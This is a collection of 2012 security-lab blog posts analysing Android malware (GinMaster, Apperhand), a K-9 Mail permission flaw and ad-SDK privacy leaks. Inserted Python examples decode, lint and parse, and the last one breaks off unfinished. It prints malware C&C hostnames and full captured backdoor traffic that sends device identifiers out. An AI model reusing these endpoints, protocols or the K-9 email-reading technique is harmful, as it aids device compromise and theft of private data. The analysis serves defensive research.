
On the Verge of Polymorphic Mobile Malware?
—— A new variant of GinMaster found in the wild.

February 22, 2012 By TrustGo Security Labs

Yesterday (2/21/2012), TrustGo Security Labs uncovered a significant evolution of the notorious GinMaster malware. Our tests indicate the new variant of GinMaster can successfully evade detection by all the leading mobile anti-virus software, much like the situation when it was first discovered. Our investigation has revealed that this new variant of GinMaster has been injected into over 100 legitimate apps, which are then distributed on alternative Android markets.

TrustGo has named this new variation GinMaster.d.Trojan.Android.

GinMaster was first found by researchers from North Carolina State University on 8/17/2011. It is the first malware to utilize a rooting exploit that targets Android 2.3.3 (Gingerbread) devices, allowing escalation of privileges on the system. Once this exploit has been exercised successfully, GinMaster may install additional applications to the device without the user's consent.

The most impressive feature of the original GinMaster is the extreme lengths it goes to in order to evade detection by anti-virus software. For example, it obfuscates the class name of each infected object (see Figure 1), so GinMaster cannot be caught simply by matching the full class name.

Figure 1: Obfuscated class name

GinMaster also changes the URL address of its Command and Control (C&C) server to avoid detection. We have seen at least 3 C&C servers used by this malware:

	http://client.mustmobile.com
	http://client.139vps.com
	http://client.go360days.com

The new variant of GinMaster we’ve discovered takes the above a step further; it actually encrypts these URLs!

Figure 2 shows the encrypted string. It is decrypted at runtime with the simple password 0x18, as shown in Figure 3. The decrypted string is the C&C server’s URL address:

http://client.go360days.com/report/open_table.do

Figure 2: Encrypted string

Figure 3: Decrypt method
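An added example (not code from TrustGo or from the sample) of the kind of helper an analyst writes to confirm such a string: it assumes the decrypt method is a byte-wise XOR with 0x18, which the post does not state, brute-forces the key when it is not yet known from the decompiled method, and yields the hostname to put on a block list.

```python
"""Recover a C&C URL that a sample hides behind a one-byte key.

Added example for this post; it is not TrustGo's or GinMaster's code.
Assumption: the decrypt method in Figure 3 applies the "password" 0x18
as a byte-wise XOR. The post gives only the key value, so XOR is assumed.
"""
from urllib.parse import urlparse

KEY = 0x18
# Constructed sample: the URL quoted in the post, encoded with the assumed
# key. These are not the bytes of the real sample.
PLAIN_URL = b"http://client.go360days.com/report/open_table.do"
ENCODED = bytes(b ^ KEY for b in PLAIN_URL)


def xor_decode(data: bytes, key: int) -> bytes:
    """Apply a one-byte XOR key to every byte (XOR is its own inverse)."""
    return bytes(b ^ key for b in data)


def recover_urls(blob: bytes, marker: bytes = b"http://") -> list:
    """Try all 256 one-byte keys and keep the ones that yield printable text
    starting with a URL scheme. Handy when the key has not yet been read
    out of the decompiled decrypt method."""
    hits = []
    for key in range(256):
        candidate = xor_decode(blob, key)
        if candidate.startswith(marker) and all(32 <= c < 127 for c in candidate):
            hits.append((key, candidate.decode("ascii")))
    return hits


def c2_host(url: str) -> str:
    """Hostname to feed into a DNS or proxy block list / watch list."""
    return urlparse(url).hostname or ""


if __name__ == "__main__":
    for key, url in recover_urls(ENCODED):
        print(f"key=0x{key:02x} url={url} host={c2_host(url)}")
```

Because XOR with a single byte is a bijection on the first byte, only one key can turn the blob into text beginning with `http://`, so the brute force returns exactly one candidate for a string like this one.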

In the world of traditional PC viruses, polymorphic malware attempts to evade detection by encrypting itself differently, and rewriting the decrypting module accordingly. The newest variant of GinMaster now uses encryption as well, but the decrypting module is still static. It’s not a far stretch to suggest that GinMaster or another new malware could use a different cipher code for each decrypting module. With a dynamic cipher code, these pieces of software would effectively become the first known examples of polymorphic mobile malware.

Besides the added encryption, the new GinMaster variant also extends its ability to control the user’s screen. It adds a View through the WindowManager service and sets the window type to “Toast”. A toast window can appear on top of other applications even after the user has quit the malware (see Figure 5).

Upon clicking the toast window, GinMaster will download applications and prompt the user to install them.

Figure 4: Screen control

Figure 5: Toast Window

K-9 mail client is vulnerable to privacy leak

February 15, 2012 By TrustGo Security Labs

Application information

App name: K-9 Mail
App vendor: K-9 Dog Walkers
Package name: com.fsck.k9
Affected version: 4.005
Updated: January 27, 2012
Affected users: 1,000,000 - 5,000,000
Category: Communication
Vendor's website: http://code.google.com/p/k9mail/
App download link: https://market.android.com/details?id=com.fsck.k9&feature=search_result&hl=en

Vulnerability information

Found date: 2012/2/13
Found by: TrustGo
Impact: Privacy leak
Severity: High
Distribution: High
Has POC: Yes

Abstract

K-9 is the most popular email client for Android. It is an open-source e-mail client with numerous features, including search, IMAP push email, multi-folder sync, flagging, filing, signatures, bcc-self, PGP, mail on SD, etc. It has been downloaded between 1 million and 5 million times from Google Android Market.

K-9 version 4.005 has a vulnerability wherein a user’s email may be exposed to other apps. A malicious app without any system permissions can easily exploit K-9’s vulnerability to collect all the user’s emails and leak them to an arbitrary website.

Details

A malicious app can obtain the user’s emails from K-9 without the user’s consent.

K-9 declares the ContentProvider com.fsck.k9.provider.MessageProvider:

<provider
android:name="com.fsck.k9.provider.MessageProvider"
android:authorities="com.fsck.k9.messageprovider"
android:multiprocess="true"
android:grantUriPermissions="true"
android:readPermission="com.fsck.k9.permission.READ_MESSAGES"
android:writePermission="com.fsck.k9.permission.DELETE_MESSAGES"/>

K-9 declares the permission “com.fsck.k9.permission.READ_MESSAGES” as:

<permission android:name="com.fsck.k9.permission.READ_MESSAGES"
android:permissionGroup="android.permission-group.MESSAGES"
android:protectionLevel="normal"
android:label="@string/read_messages_label"
android:description="@string/read_messages_desc"/>

Since the protection level of the permission “com.fsck.k9.permission.READ_MESSAGES” is normal, any app can request it, and any app holding this permission can read the emails in the K-9 mail client.

Thus an app can obtain emails from K-9 merely by declaring the permission “com.fsck.k9.permission.READ_MESSAGES”. Combined with the very commonly used INTERNET permission, an app can easily leak the user’s emails to a website of its choice. Even without the INTERNET permission, an app can leak the user’s emails to the internet by exploiting another feature of the Android web browser.

This is very dangerous when users access business email with K-9 mail client.
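The weakness is visible from the manifest alone, so it can be linted for. The following added example (not K-9 or TrustGo code) parses manifest fragments constructed from the snippets above and reports every provider permission whose protectionLevel is not signature-based, is never declared, or is missing entirely. The hardened fragment, with both permissions at signature level, is this example's assumed fix, not necessarily what K-9 shipped; the DELETE_MESSAGES declaration is not shown in the post, so the vulnerable fragment leaves it out and the lint reports it as undeclared.

```python
"""Lint an AndroidManifest.xml for content providers guarded only by a
weak custom permission, the pattern behind the K-9 finding above.

Added example; not K-9's code and not TrustGo's tooling. Both manifest
fragments are constructed from the snippets quoted in the post.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
# Only these levels keep a custom permission away from arbitrary third-party apps.
STRONG_LEVELS = {"signature", "signatureOrSystem"}

VULNERABLE_MANIFEST = f"""
<manifest xmlns:android="{ANDROID_NS}" package="com.fsck.k9">
  <permission android:name="com.fsck.k9.permission.READ_MESSAGES"
      android:permissionGroup="android.permission-group.MESSAGES"
      android:protectionLevel="normal"/>
  <application>
    <provider android:name="com.fsck.k9.provider.MessageProvider"
        android:authorities="com.fsck.k9.messageprovider"
        android:multiprocess="true"
        android:grantUriPermissions="true"
        android:readPermission="com.fsck.k9.permission.READ_MESSAGES"
        android:writePermission="com.fsck.k9.permission.DELETE_MESSAGES"/>
  </application>
</manifest>
"""

# Hardened form (constructed, assumed fix): both permissions declared at
# signature level, so only apps signed with K-9's own key can hold them.
HARDENED_MANIFEST = f"""
<manifest xmlns:android="{ANDROID_NS}" package="com.fsck.k9">
  <permission android:name="com.fsck.k9.permission.READ_MESSAGES"
      android:protectionLevel="signature"/>
  <permission android:name="com.fsck.k9.permission.DELETE_MESSAGES"
      android:protectionLevel="signature"/>
  <application>
    <provider android:name="com.fsck.k9.provider.MessageProvider"
        android:authorities="com.fsck.k9.messageprovider"
        android:readPermission="com.fsck.k9.permission.READ_MESSAGES"
        android:writePermission="com.fsck.k9.permission.DELETE_MESSAGES"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an android:-namespaced attribute."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def weak_provider_permissions(manifest_xml: str) -> list:
    """Return one finding per provider permission attribute that does not
    hold other apps back: protectionLevel normal/dangerous, a permission
    this manifest never declares, or no permission at all."""
    root = ET.fromstring(manifest_xml.strip())
    # Android treats a missing protectionLevel as "normal".
    levels = {_attr(p, "name"): _attr(p, "protectionLevel") or "normal"
              for p in root.iter("permission")}
    findings = []
    for prov in root.iter("provider"):
        if _attr(prov, "exported") == "false":
            continue  # unreachable from other packages; nothing to report
        # Providers without android:exported were exported by default on the
        # Android versions current when this post was written (before API 17).
        guarded = False
        for attr in ("permission", "readPermission", "writePermission"):
            perm = _attr(prov, attr)
            if perm is None:
                continue
            guarded = True
            level = levels.get(perm, "undeclared")
            if level not in STRONG_LEVELS:
                findings.append({"provider": _attr(prov, "name"), "attribute": attr,
                                 "permission": perm, "protectionLevel": level})
        if not guarded:
            findings.append({"provider": _attr(prov, "name"), "attribute": None,
                             "permission": None, "protectionLevel": "none"})
    return findings


if __name__ == "__main__":
    for label, xml in (("vulnerable", VULNERABLE_MANIFEST), ("hardened", HARDENED_MANIFEST)):
        print(label, weak_provider_permissions(xml))
```

Run against the vulnerable fragment it reports the readPermission at level normal and the writePermission as undeclared; the hardened fragment produces no findings.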

Security of In-App Mobile Advertising

February 1, 2012 By TrustGo Security Labs

In-app mobile advertising grew explosively in the year 2011 as more and more mobile apps were developed, and it’s now projected to be at least a $2 billion industry. Just how popular is it? In Google’s Android Market, 50% of all free apps communicate with at least one mobile advertising network.

If we look at the alternative markets alone, the percentage is higher, with nearly two-thirds (61.4%) of apps containing mobile ads.

In-app mobile advertising indeed brings money to app developers, which easily explains the numbers above. For the user, beyond being a source of minor annoyance, it may also be a security and privacy risk.

We recently analyzed more than 100 in-app mobile advertising platforms on Android, and found that a large portion of advertising platforms have security, privacy and usability issues.

Here are some of the issues we identified:

Privacy leaks

Mobile advertising is a big threat to a user’s privacy. We observed that 88% of mobile advertising platforms leaked information--in clear text--that could be used to identify the user or device, such as the IMEI, IMSI, etc.

28% of the mobile advertising platforms leaked the user’s phone number; these platforms are currently embedded in about 36,000 Android apps worldwide, which have been downloaded more than 1.3 billion times in total.

Most of the advertising platforms send the user’s phone number to their website via an HTTP GET method when retrieving advertisements. Here is a URL used by one of the platforms for getting advertisements (the phone number is highlighted in red in the original):

ad.xxxxxx.com/ad/?t=1&v=1.0&s=4&sv=1&uid=000000000000000&id=XNZDYYYY&tm=100&fm=100&m=sdk&loc=zh-CN&gps=0%2C0&bas=0&lac=0&imsi=310260000000000&sc=15555218135&w=320&h=50

Code snippet from another platform:

Some of them send the phone number in binary format via an HTTP POST method:
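As an added example (not TrustGo tooling), a check that can run over proxy logs to spot the GET form of this leak: it parses the URL quoted above and flags query parameters whose name or value shape suggests an IMEI, IMSI or phone number, and records whether the request went in clear text. The parameter-name list and the digit-length heuristics are assumptions of this example.

```python
"""Flag device and subscriber identifiers in ad-request URLs from a proxy log.

Added example, not TrustGo's tooling. SAMPLE_URL is the request quoted in
the post (its identifiers are already placeholder values there); the
parameter-name hints and digit-length heuristics are this example's own.
"""
import re
from urllib.parse import parse_qsl, urlsplit

SAMPLE_URL = ("ad.xxxxxx.com/ad/?t=1&v=1.0&s=4&sv=1&uid=000000000000000&id=XNZDYYYY"
              "&tm=100&fm=100&m=sdk&loc=zh-CN&gps=0%2C0&bas=0&lac=0"
              "&imsi=310260000000000&sc=15555218135&w=320&h=50")

# Parameter names that commonly carry identifiers (assumed list).
NAME_HINTS = {"imei", "imsi", "msisdn", "phone", "tel", "mac", "iccid"}
# Value shapes: IMEI and IMSI are 15 digits; phone numbers 10-13 digits.
VALUE_PATTERNS = {
    "15-digit (IMEI/IMSI-like)": re.compile(r"^\d{15}$"),
    "10-13 digit (phone-number-like)": re.compile(r"^\+?\d{10,13}$"),
}


def find_identifier_leaks(url: str) -> list:
    """Return one finding per query parameter that looks like a device or
    subscriber identifier, with the reasons it was flagged."""
    if "://" not in url:
        url = "http://" + url  # the post quotes the URL without a scheme
    parts = urlsplit(url)
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        reasons = []
        if name.lower() in NAME_HINTS:
            reasons.append("parameter name")
        reasons += [label for label, rx in VALUE_PATTERNS.items() if rx.match(value)]
        if reasons:
            findings.append({"host": parts.hostname, "param": name, "value": value,
                             "cleartext": parts.scheme == "http", "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_identifier_leaks(SAMPLE_URL):
        print(finding)
```

On the quoted URL this flags `uid` (15 digits), `imsi` (by name and shape) and `sc` (11 digits, phone-number-like); the remaining parameters are screen size, locale and ad-slot values and pass untouched.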

Installing apps without confirmation

Mobile advertisements are sometimes used for app promotion. When these ads are clicked, the user will be redirected to a download page, or an application will be downloaded automatically without clear notice.

30% of mobile advertising platforms have this type of advertisement. Of those, 70% directly download an application package instead of going through the Android Market. Downloading the application directly is a huge security risk. Since the app being downloaded is provided by an advertiser rather than a trusted source, malicious advertisers can easily use this method to distribute malware. This technique has already been used by some malware, such as “GGTracker”, which was discovered in June 2011.

Texting without confirmation

Fortunately, the practice of sending unsolicited text messages is not yet as widespread, though we still found some perpetrators. For example, one of the platforms provides a JavaScript file for the advertiser to embed in their web page. This JavaScript contains code to directly send a text message through the Android Java sendTextMessage() API.

JavaScript code:

Java code:

Since the web content is controlled by the advertiser, the advertiser is able to control whether a message is sent, as well as what’s included as message content.

Calling phones without confirmation

Some advertising platforms induce the user to make a phone call to the advertiser. These platforms make the calls in two different ways: by bringing up the system dialer UI, or by calling the number directly.

Among those platforms making phone calls directly, we found that only one of them makes phone calls without user confirmation, while all the others will show a dialog before the call is actually made.

Creating advertisement shortcuts on the desktop

Some applications add a shortcut linked to the advertiser’s website without the user’s awareness.

Writing text messages directly to the inbox

We found that one of the advertising platforms writes advertisements directly to the user’s SMS inbox, which tricks the user into thinking that he/she has just received a message from a trustworthy sender.

Notification ads

Some advertising platforms can push ads to the user’s phone, usually appearing in the notification bar. The push features are commonly implemented using an Android service. Once started, the service will be always running, even if the user exits the app. Some applications will even configure the service to start automatically at each system boot.

We believe that uncovering these security and privacy issues surrounding in-app mobile advertising is important for both mobile end-users and developers. As a user, without awareness of these threats, your identity and personal data could be at risk. For developers, it means that an app you write may be collecting sensitive data or performing other malicious tasks on behalf of your advertiser, without the awareness of you or your customers.

Here are some suggestions for mobile users:

  1. Do not click links or banner ads unless you are very sure about the content. Never install apps directly from in-app ads or advertisers’ websites. Instead, get apps from the Android Market, or use the TrustGo Mobile Security / TrustGo Mobile Search apps to find and download trusted apps from over 30 Android markets worldwide.
  2. To keep your identity and your mobile device safe, we strongly recommend installing the TrustGo Mobile Security app, which provides everything you need to guard against not just malicious advertisements, but also malware, viruses, and other privacy threats.
    https://market.android.com/details?id=com.trustgo.security.beta&feature=search_result&hl=en
  3. TrustGo also provides AD Detector app. Ad Detector detects a slew of potential privacy violations and identity leaks, including newly found malware Apperhand. It's an easy way to see which apps may be doing dangerous things behind your back. Once detected, with just one click, you can remove these apps from your mobile device.
    https://market.android.com/details?id=com.trustgo.addetector&feature=search_result&hl=en

If you’re developing an Android app, here are some recommendations:

  1. Carefully choose your advertising platform. Be sure you fully understand its behavior before integrating it into your code.
  2. Remember that virtually none of your users will understand the distinction between your app and the ad platform, so any security issue encountered will hurt the reputation of your app and your brand.
  3. If you’re unsure about a particular advertising platform, feel free to email us, and we’ll be happy to share more detailed information.

Malware Apperhand Found in Official Android Market

February 1, 2012 By TrustGo Security Labs

Summary

On 2012/1/12, TrustGo found more than 70 apps (see Appendix 2) on Google’s official Android Market infected with the Apperhand.a.Backdoor.Android malware. This malicious code opens a backdoor to a remote command-and-control (C&C) server, from which it retrieves commands and then performs them.

TrustGo has reported this finding to Google Android Security Team on 2012/1/12.

Detailed Analysis

Apperhand.a.Backdoor.Android is a malicious application for Android phones. This malware contacts a remote C&C server and responds to a few hard-coded commands from that server, such as:

  • homepage: sets a given URL as the browser homepage
  • bookmarks: gets/sets a list of bookmarks in the phone's browser
  • shortcuts: gets/sets a list of shortcuts on the phone's main application page
  • notifications: pushes notification ads to the phone’s notification area

In our case, unwanted behavior initiated by Apperhand included:

  1. Modified our browser homepage to the following URL:
    http://www.searchmobileonline.com/?sourceid=6&app=bg3ELZK%2FVVW4eFFdaD8qKARoih9CmK5ZfLxv4Ta%2FvI2vxAneCNgamcZxBXtWMfHi2c3yvRh1%2FCnH3N%2BnKvk91w%3D%3D
    When this URL is processed and the page opened (which happens as soon as the browser starts), the address shown is http://start.infospace.com
    This website has generated many complaints among mobile users, as evidenced by a simple Google query.
  2. Added two bookmarks to our default browser, according to content retrieved from the C&C server.
  3. Created a shortcut on our home screen. Again, the C&C server was responsible for both the command to create the shortcut, as well as its content.
  4. Displayed push notification ads in our phone’s notification tray.
  5. Leaked the following information to the C&C server:
    DeviceId, device brand, manufacturer, model, OS, versionRelease, versionSDKInt, displayMetrics:{density, densityDpi, heightPixels, scaledDensity, widthPixels, xdpi, ydpi}, locale, protocolVersion, sourceIp, userAgent

Evidence

The malicious code exists in com.apperhand.*

Figure 1: Source code of malware Apperhand

The following code shows the command list used to communicate with the C&C server. We found that the source code of Apperhand is very similar to that of a confirmed malware called Plankton, which was discovered by Prof. Xuxian Jiang in June 2011.

Figure 2: Source code of malware Plankton

A detailed sample of the communication sequence between Apperhand and the C&C server can be found in Appendix 1.

Appendix 1

The following table shows the communication between client and C&C server.

Each exchange below is shown as the client request followed by the C&C response.

Client request:
POST /ProtocolGW/protocol/commands HTTP/1.1
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D 
protocol-version: 1.0.6 
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 
Content-Type: application/json 
Accept-Encoding: gzip 
Accept: application/json 
Content-Length: 689 
Host: www.apperhand.com 
Connection: Keep-Alive  
{"initiationType": "first time", "needSpecificParameters":true, "applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}} 
C&C response:
HTTP/1.1 200 OK
Content-Type: application/json 
Date: Tue, 17 Jan 2012 06:40:27 GMT 
Server: Apache-Coyote/1.1 
Content-Length: 208 
Connection: keep-alive   
{"commands": [{"id": "fabcc997-0f84-4cd2-acbe-6325943159b9", "parameters":null, "command": "ACTIVATION"}], "commandsInterval":15, "parameters": {}, "abTest": "3742aa6a-7a72-4fd9-abce-7ef86c2023dd", "validResponse":true}
Client request:
POST /ProtocolGW/protocol/activate HTTP/1.1
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D
protocol-version: 1.0.6
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 
Content-Type: application/json 
Accept-Encoding: gzip 
Accept: application/json 
Content-Length: 690 
Host: www.apperhand.com 
Connection: Keep-Alive  
{"missingParameters": ["ACTIVATED"], "firstTimeActivation":true, "applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}} 
 
C&C response:
HTTP/1.1 200 OK
Content-Type: application/json 
Date: Tue, 17 Jan 2012 06:40:31 GMT 
Server: Apache-Coyote/1.1 
Content-Length: 307 
Connection: keep-alive  
{"activation": {"parameters": {"SEARCH_URL": "http://www.searchmobileonline.com/{$CATEGORY$}?sourceid=7&app=V%2Bd%2FMs1MPLlT3I%2BxWFt0Yw4se4pJuTbM%2FGuC3fwHdmXFRBCquOUB5HXylUtrvc5aUBNR2%2BL8FLNREKwHglltKA%3D%3D&q={$QUERY$}"}, "eula": "http://wwww.our-ula.com"}, "parameters": {}, "abTest":null, "validResponse":true}
Client request:
POST /ProtocolGW/protocol/commandstatus HTTP/1.1
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D
protocol-version: 1.0.6
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 
Content-Type: application/json 
Accept-Encoding: gzip 
Accept: application/json 
Content-Length: 820 
Host: www.apperhand.com 
Connection: Keep-Alive  
{"statuses": [{"message": "com.custom.lwp.AHDRedHeartOnRedSea was activated, SABABA!!!", "status": "SUCCESS", "command": "ACTIVATION", "id": "fabcc997-0f84-4cd2-acbe-6325943159b9", "parameters":null}], "applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}} 
C&C response:
HTTP/1.1 200 OK
Content-Type: application/json 
Date: Tue, 17 Jan 2012 06:40:38 GMT 
Server: Apache-Coyote/1.1 
Content-Length: 77 
Connection: keep-alive  
{"nextCommandInterval":15, "abTest":null, "validResponse":true, "parameters": {}}
 
Client request:
POST /ProtocolGW/protocol/shortcuts HTTP/1.1
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D
protocol-version: 1.0.6
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 
Content-Type: application/json 
Accept-Encoding: gzip 
Accept: application/json 
Content-Length: 652 
Host: www.apperhand.com 
Connection: Keep-Alive  
{"supportLauncher":true, "applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}} 
 
C&C response:
HTTP/1.1 200 OK
Content-Encoding: gzip 
Content-Type: application/json 
Date: Tue, 17 Jan 2012 06:41:05 GMT 
Server: Apache-Coyote/1.1 
Vary: Accept-Encoding 
Vary: Accept-Encoding 
Content-Length: 6362 
Connection: keep-alive  
"shortcutList" 
"icon": [truncated] 
"screen": -1 
"name": Search 
"id": -1 
"link": http://www.searchmobileonline.com/?sourceid=0&app=Iw0P44FnTv4zoHdY1ViwWIf%2Blod209JmBBv3Seu7myCASqK6jjaRh%2B2aBsUBSJ%2BbHyMG1STlZ3JA9O64e8cwXw%3D%3D
"status": ADD 
Client request:
POST /ProtocolGW/protocol/bookmarks HTTP/1.1
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D
protocol-version: 1.0.6
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 
Content-Type: application/json 
Accept-Encoding: gzip 
Accept: application/json 
Content-Length: 629 
Host: www.apperhand.com 
Connection: Keep-Alive  
{"applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}} 
 
C&C response:
HTTP/1.1 200 OK
Content-Encoding: gzip 
Content-Type: application/json 
Date: Tue, 17 Jan 2012 06:41:17 GMT 
Server: Apache-Coyote/1.1 
Vary: Accept-Encoding 
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive  
"bookmarks" 
"id": -1 
"status": ADD 
"title": Search 
"url":  http://www.searchmobileonline.com/?sourceid=1&app=FrX8LTKgLzLAkj%2FAspG%2F2cARpr1nY4AHilQegP7guyuPG4UtsT2wPXAl%2FT8NN9jwKIWJh%2BDKEWE%2FE6lyzGBZ7w%3D%3D 
"favicon": [truncated]  
"id": -1 
"status": ADD 
"title": Search the web 
"url":  http://www.searchmobileonline.com/?sourceid=2&app=9B4zOudgt3E%2FB7iF07ahpdqiolJg2jy5dfktzdCslaPOF6By%2B6vHeu73oh66fRU3myk0P3BNtuMcuHgyF9Nn8Q%3D%3D
"favicon": [truncated]
Client request:
POST /ProtocolGW/protocol/homepage HTTP/1.1
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D
protocol-version: 1.0.6
User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: application/json 
Accept-Encoding: gzip 
Accept: application/json 
Content-Length: 629 
Host: www.apperhand.com 
Connection: Keep-Alive  
{"applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}} 
 
C&C response:
HTTP/1.1 200 OK
Content-Type: application/json 
Date: Tue, 17 Jan 2012 06:41:29 GMT 
Server: Apache-Coyote/1.1 
Content-Length: 228 
Connection: keep-alive  
{"homepage": {"pageURL": "http://www.searchmobileonline.com/?sourceid=6&app=bg3ELZK%2FVVW4eFFdaD8qKARoih9CmK5ZfLxv4Ta%2FvI2vxAneCNgamcZxBXtWMfHi2c3yvRh1%2FCnH3N%2BnKvk91w%3D%3D"}, "abTest":null, "validResponse":true, "parameters": {}} 
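An added example (not TrustGo's tooling and not the malware's code) that reduces a captured exchange like those above to what an incident responder needs: the endpoint, the device-id header, the fields the client reports about the handset, the commands and polling interval the server returns, and any URLs it pushes down. The two exchanges embedded below are copied from this appendix (commands and homepage), with the header lists trimmed and a standard blank line between headers and body.

```python
"""Pull the operator's instructions out of a captured Apperhand C&C exchange.

Added example, not TrustGo's tooling and not the malware's code. The
exchanges below are copied from Appendix 1 with headers trimmed.
"""
import json

COMMANDS_REQUEST = """POST /ProtocolGW/protocol/commands HTTP/1.1
device-id: wCxwXphYj3JMoEasWcr%2BzmVQHjY%3D
protocol-version: 1.0.6
Content-Type: application/json
Host: www.apperhand.com

{"initiationType": "first time", "needSpecificParameters":true, "applicationDetails": {"abTests":null, "applicationId": "201460726", "build": {"brand": "generic", "device": "generic", "manufacturer": "unknown", "model": "sdk", "os": "Android", "versionRelease": "2.2", "versionSDKInt":8}, "developerId": "101785225", "deviceId": "wCxwXphYj3JMoEasWcr+zmVQHjY=", "displayMetrics": {"density":1.5, "densityDpi":240, "heightPixels":800, "scaledDensity":1.5, "widthPixels":480, "xdpi":240.0, "ydpi":240.0}, "locale": "en_US", "protocolVersion": "1.0.6", "sourceIp":null, "userAgent": "Mozilla/5.0 (Linux; U; Android 2.2; en-us; sdk Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"}, "parameters": {}}
"""

COMMANDS_RESPONSE = """HTTP/1.1 200 OK
Content-Type: application/json
Date: Tue, 17 Jan 2012 06:40:27 GMT

{"commands": [{"id": "fabcc997-0f84-4cd2-acbe-6325943159b9", "parameters":null, "command": "ACTIVATION"}], "commandsInterval":15, "parameters": {}, "abTest": "3742aa6a-7a72-4fd9-abce-7ef86c2023dd", "validResponse":true}
"""

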